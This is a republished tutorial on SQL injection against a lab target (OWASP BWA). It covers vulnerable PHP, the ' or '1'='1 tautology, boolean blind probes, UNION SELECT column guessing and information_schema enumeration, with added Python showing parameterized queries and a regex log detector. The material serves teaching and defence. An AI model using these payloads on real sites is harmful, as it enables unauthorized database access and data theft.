2025-04-04 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article presents a "sample analysis of SQL injection". It is written to be easy to understand and clear, and I hope it helps resolve your doubts. Let the editor lead you through the article "Sample Analysis of SQL Injection".
General idea of a SQL injection attack
1. Find the location of the SQL injection
2. Determine the server type and the back-end database type
3. Carry out SQL injection attacks tailored to the specific server and database
About SQL Injection
SQL injection deceives the server or database into executing malicious SQL commands by inserting those commands into a web form (or any other input) so that they become part of the query the application builds.
To learn SQL injection, you first need a target environment. I use OWASP BWA (Broken Web Applications); if you are interested, you can download and install it from the official website. Besides SQL injection, many other practice targets are included in BWA, and it is designed to be used together with the OWASP ZAP penetration-testing tool.
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";   // $id is pasted straight into the SQL string
$result = mysql_query($getid) or die('' . mysql_error() . '');             // the raw database error is sent to the client
$num = mysql_numrows($result);
This is a very simple piece of PHP code: it takes the value of id from the front end, hands it to the database for execution, and returns the result to the front end.
For example, enter id = 1 in OWASP and click Submit, and the query result for that id is returned.
Anyone who knows a little about back-end code or databases can see that the code above has a serious problem: the value of id is never checked for validity or legitimacy. In other words, whatever we type in the Submit input box is sent to the database and executed. For example, enter 1' or '1'='1 in the input box, and the statement that is executed becomes:
// The command originally executed by the database, SELECT first_name, last_name FROM users WHERE user_id = '1', becomes SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1'
Pay attention to the single quotation marks; they are a very important part of SQL injection. The injected text ends with '1'='1 without a closing quote, so that the single quote the application appends after $id closes the string and the statement stays syntactically valid.
Because the or condition is always true, all the rows of the users table are returned.
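As an added example (not code from the original article), the following Python script rebuilds the PHP lookup above against an in-memory SQLite table and runs the article's 1' or '1'='1 input through both the string-concatenated query and a parameterized one; the table contents and names are constructed.

```python
import sqlite3

# Constructed stand-in for the users table the PHP snippet queries.
USERS = [(1, "Doris", "Lee"), (2, "Jaune", "Park"), (3, "Alisa", "Roy")]
PAYLOAD = "1' or '1'='1"   # the input shown in the article


def make_db():
    """In-memory SQLite database with the same columns as the PHP example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the PHP: the raw request value is pasted into the SQL text,
    so quotes in the input change the structure of the statement."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same query with a bound parameter: the driver sends the input as a
    value, so the database never parses it as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "1"))       # one row, as intended
    print(lookup_vulnerable(conn, PAYLOAD))   # WHERE user_id = '1' or '1'='1' -> every row
    print(lookup_safe(conn, PAYLOAD))         # [] : no user_id equals that string
```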
The three main types of injection are described below.
Analysis of the Boolean-based principle
First of all, we have to talk about AND and OR in SQL.
AND and OR can combine two or more conditions in the WHERE clause.
AND: returns the records for which both the first and the second condition hold.
OR: returns the records that meet either the first or the second condition.
AND and OR correspond to intersection and union in set theory.
The following is the content of a database table.
mysql> select * from students;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
| 10060 | Alisa |  29 |
+-------+-------+-----+
3 rows in set (sec)
1)
mysql> select * from students where TRUE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
| 10060 | Alisa |  29 |
+-------+-------+-----+
3 rows in set (sec)
2)
mysql> select * from students where FALSE;
Empty set (0.00 sec)
3)
mysql> select * from students where id = 10056 and TRUE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
+-------+-------+-----+
1 row in set (sec)
4)
mysql> select * from students where id = 10056 and FALSE;
Empty set (0.00 sec)
5)
mysql> select * from students where id = 10056 or TRUE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
| 10058 | Jaune |  22 |
| 10060 | Alisa |  29 |
+-------+-------+-----+
3 rows in set (0.00 sec)
6)
mysql> select * from students where id = 10056 or FALSE;
+-------+-------+-----+
| id    | name  | age |
+-------+-------+-----+
| 10056 | Doris |  20 |
+-------+-------+-----+
1 row in set (sec)
You will find that and 1=1 and and 1=2 are just variants of and TRUE and and FALSE.
This is the most basic Boolean injection; on top of it you can freely combine statements.
Dictionary brute-force flow
and exists (select * from ?)    // ? is the guessed table name
and exists (select ? from x)    // ? is the guessed column name, x the table found in the previous step
Substring and binary-search flow
and (length((select schema_name from information_schema.schemata limit 1)) > ?)    // judge the length of the database name
and (substr((select schema_name from information_schema.schemata limit 1), 1, 1) > '?')    // judge the database name one character at a time, narrowing the range by binary search
The following examples use a union query to read names from information_schema directly.
1)
mysql> select name from students where id = -1 union select schema_name from information_schema.schemata;    // database names
+--------------------+
| name               |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| rumRaisin          |
| t3st               |
| test               |
+--------------------+
6 rows in set (0.00 sec)
2)
mysql> select name from students where id = -1 union select table_name from information_schema.tables where table_schema = 't3st';    // table names
+----------+
| name     |
+----------+
| master   |
| students |
+----------+
2 rows in set (0.00 sec)
3)
mysql> select name from students where id = -1 union select column_name from information_schema.columns where table_name = 'students';    // column names
+------+
| name |
+------+
| id   |
| name |
| age  |
+------+
3 rows in set (0.00 sec)
The UNION operator merges the result sets of two or more SELECT statements. Note that the SELECT statements inside a UNION must return the same number of columns, the columns must have compatible data types, and the columns of each SELECT must be in the same order.
For example, the original OWASP query returns two values, first_name and last_name. When the server receives the database result, it passes the first and second values of each row to first_name and last_name; a UNION that returns more or fewer columns than that causes an error.
So if you want to use a union query for injection, you first have to work out how many columns the back-end query selects and which of those columns are echoed back to the user.
Guess the number of columns
-1 union select 1
-1 union select 1, 2
-1 union select 1, 2, 3
...    // keep adding a column until the page is displayed normally
For example, take this statement:
-1 UNION SELECT 1, 2, 3, 4
If the values displayed are 3 and 4, the query returns four columns, and the third and fourth columns are the useful ones. The corresponding union statement is then constructed as follows:
-1 UNION SELECT 1, 2, username, ? FROM table    // ? is the other column to read into the fourth position
The above is all the content of this article, "Sample Analysis of SQL Injection".
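Added example (not part of the original article): a small detector that decodes the query parameters in web-server access log lines and flags the patterns walked through above (the quote tautology, UNION SELECT column probes, information_schema reads, length/substr/exists probes). The log lines, the lookup.php path, the client addresses and the rule names are all constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Patterns for the techniques walked through above (rule names are constructed).
RULES = {
    "tautology": re.compile(r"'\s*or\s*'?\w+'?\s*=\s*'?\w+", re.I),
    "union_select": re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.I),
    "schema_enum": re.compile(r"information_schema\.", re.I),
    "blind_probe": re.compile(r"\b(?:length|substr|exists)\s*\(", re.I),
}

# Apache combined-format request line: client, timestamp, "METHOD path HTTP/x".
LINE_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def inspect_request(path_and_query):
    """Return the names of the rules that fire on any parameter value of the URL."""
    hits = set()
    for _, value in parse_qsl(urlsplit(path_and_query).query, keep_blank_values=True):
        value = unquote_plus(value)   # second decode pass catches double-encoded values
        for name, rx in RULES.items():
            if rx.search(value):
                hits.add(name)
    return hits


def scan_access_log(lines):
    """Return (client_ip, url, hits) for every request line that fires a rule."""
    flagged = []
    for line in lines:
        m = LINE_RX.match(line)
        if m and (hits := inspect_request(m.group(2))):
            flagged.append((m.group(1), m.group(2), hits))
    return flagged


# Constructed sample log lines; the path and the client addresses are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Apr/2025:10:00:01 +0000] "GET /lookup.php?id=1&Submit=Submit HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Apr/2025:10:00:02 +0000] "GET /lookup.php?id=1%27+or+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 1833',
    '10.0.0.9 - - [04/Apr/2025:10:00:03 +0000] "GET /lookup.php?id=-1+union+select+1%2C2&Submit=Submit HTTP/1.1" 200 640',
    '10.0.0.9 - - [04/Apr/2025:10:00:04 +0000] "GET /lookup.php?id=1+and+length((select+schema_name+from+information_schema.schemata+limit+1))%3E5&Submit=Submit HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, url, hits in scan_access_log(SAMPLE_LOG):
        print(ip, sorted(hits), url)
```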
© 2024 shulou.com SLNews company. All rights reserved.